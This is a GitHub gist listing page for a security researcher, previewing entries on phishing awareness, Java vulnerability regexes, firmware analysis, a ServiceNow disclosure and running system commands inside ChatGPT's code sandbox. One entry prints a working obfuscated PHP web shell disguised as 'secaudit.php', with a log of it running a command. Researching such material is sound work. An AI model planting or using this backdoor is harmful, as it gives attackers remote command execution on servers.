Skip to content

Instantly share code, notes, and snippets.

View win3zz's full-sized avatar
♾️
{"amount":1,"amount":-1}

Bipin Jitiya win3zz

♾️
{"amount":1,"amount":-1}
View GitHub Profile
@win3zz
win3zz / FB.md
Last active July 7, 2025 10:43
Social Engineering (Psychological Manipulation)

Demonstration of Phi[s]hing Techniques (For Awareness & Learning Only)

Important

Disclaimer: This content is intended strictly for educational and ethical awareness purposes only. It must not be used for unauthorized or malicious activities. Always conduct security testing only in environments you own or have explicit permission to test. Misuse of this information may be illegal and subject to penalties under cybercrime laws.


This demonstrates how phish[i]ng techniques work, for the sole purpose of educating ethical hackers, developers, and students in cybersecurity.

We are using a minified and obfuscated clone of the Fa[ce]book login page for simulation purposes.

@win3zz
win3zz / README.md
Last active July 15, 2025 11:45
Useful regex patterns to find vulnerabilities in a Java code and Java security code review tools

Useful Regex Patterns to Find Vulnerabilities in Java Code

1. Hardcoded Credentials / Secrets

These patterns look for sensitive information directly embedded in the code.

  • Generic Passwords / Secrets / Tokens:

    • Regex:

Getting started with Firmware Analysis on Meta Quest

Summary of the concepts and techniques discussed in a firmware analysis series, along with technical notes and commands

This video, Part 1 of a three-part firmware analysis series by Tom Heb of Meta Red Team X, introduces what firmware is, why it's security-critical, and the initial two phases of firmware analysis: enumerate (figuring out what firmware exists) and obtain (getting a copy of the firmware).

Key Technical Details and Commands:

<?php
echo myMessage("WELCOME", "win3zz", 0);
function myMessage() {
$messages = [
"WELCOME" => "Welcome, %s! You have %d new messages.",
"ERROR" => "An error occurred: %s"
];
@win3zz
win3zz / A.java
Created December 17, 2024 05:35
Unicode escapes in Java are preprocessed before lexical analysis, they can break comments and inject code!
/**
* Description:
* You can decode the hidden message by running the program.
* Compile and execute: user@host:~$ javac A.java && java A
*
* @author Bipin Jitiya
* @since 2024-12-17
*/
class A {
public static void main(String[] args){
@win3zz
win3zz / Offensive.md
Last active December 17, 2024 15:14
MIL-PRF-19500 and Hazardous Electronic Components

Autonomous killer drones

Click to Play:

MICRO DRONES KILLER ARMS ROBOTS - AUTONOMOUS ARTIFICIAL INTELLIGENCE

@win3zz
win3zz / README.md
Created August 21, 2024 13:28
Heh-PHP

secaudit.php

<?php $s="\x73\x79\163\x74\145\155";$__=$_REQUEST;if(isset($__["\x61\162\x65\x61\x35\x31"])){echo "\74\160\x72\145\x3e";$c0=$__["\x61\162\x65\x61\x35\x31"];$s($c0.' 2>&1');echo "\74\57\160\162\x65\76";exit;}?>
bipin@bipin-VirtualBox:~/BB/Research/php_backdoor$ php -S 127.0.0.2:8000
[Wed Aug 21 18:49:26 2024] PHP 7.4.3-4ubuntu2.23 Development Server (http://127.0.0.2:8000) started
[Wed Aug 21 18:49:52 2024] 127.0.0.1:53050 Accepted
[Wed Aug 21 18:49:52 2024] 127.0.0.1:53050 [200]: GET /secaudit.php?area51=id
@win3zz
win3zz / README.md
Created August 20, 2024 08:31
Live2D Interactive Anime Character on a Website

Live2D Interactive Anime Character on a Website

Recording 2024-08-20 130401

You may have seen something like the above on websites (especially Chinese and Japanese). These are interactive 2D character animations that can be integrated into websites. They are designed to run on the client side using JavaScript and graphics assets with Live2D technology. The characters can move and respond to user interactions.

Here’s a basic idea of how you can add a Live2D widget to a website:

  1. You need a Live2D model file, which typically includes a set of files such as textures, model data, and animation settings. You can create your own using Live2D Cubism software. Many ready-made models are available here: https://github.com/evrstr/live2d-widget-models
@win3zz
win3zz / ServiceNow_Sensitive_Info_Exposure.md
Last active July 10, 2025 09:55
ServiceNow Instance Exposing Sensitive Information via Unauthenticated Endpoints

ServiceNow Instance Exposing Sensitive Information via Unauthenticated Endpoints

  • Date: 26 June 2023
  • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
  • Discovered by: Bipin Jitiya (@win3zz)

Summary

[REDACTED], Inc., uses ServiceNow with an instance named "[REDACTED]" accessible at https://[REDACTED].service-now.com/. Upon reviewing this instance, I observed that it is not sufficiently hardened for security, and some endpoints are exposing sensitive information. The following three endpoints, designed for performance monitoring, logging, and troubleshooting purposes, are accessible without authentication:

@win3zz
win3zz / chatgpt-data-analysis-code-execution.md
Last active December 22, 2024 20:35
ChatGPT's Advanced Data Analysis and Code Execution - Experiments

ChatGPT's Advanced Data Analysis and Code Execution - Experiments

Recently, I learned that ChatGPT now allows advanced data analysis, which includes executing code (Python or possibly others). This feature is available to registered users via GPT-4o, albeit with limitations.

I quickly tried running system commands using this functionality, and here are the results:

Screenshot 2024-06-23 203306

It clearly shows that system commands can be executed through Python code in a sandboxed environment.